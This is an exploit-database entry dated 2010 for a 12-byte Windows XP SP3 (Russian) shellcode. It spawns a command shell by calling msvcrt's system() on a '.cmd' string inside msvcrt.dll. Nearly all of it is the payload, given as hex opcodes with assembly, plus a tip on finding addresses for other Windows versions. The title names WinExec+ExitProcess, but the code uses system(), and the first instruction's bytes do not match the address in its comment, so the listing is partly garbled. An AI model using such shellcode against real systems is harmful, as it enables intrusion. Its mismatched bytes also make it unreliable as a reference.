win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes

EDB-ID: 13647 CVE: N/A OSVDB-ID: N/A
Verified: Author: lord Kelvin Published: 2010-03-24
Download Exploit: Source Raw Download Vulnerable App: N/A
68 9D 61 F9 77  push 0x77C01345
B8 C7 93 C1 77  mov eax,msvcrt.system
FF D0           call eax
 
In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick.
Code will work in WinXP SP3 Pro Rus, in other versions you'd better search
the string and system(char*) address for yourself.
 
Coded via lord Kelvin.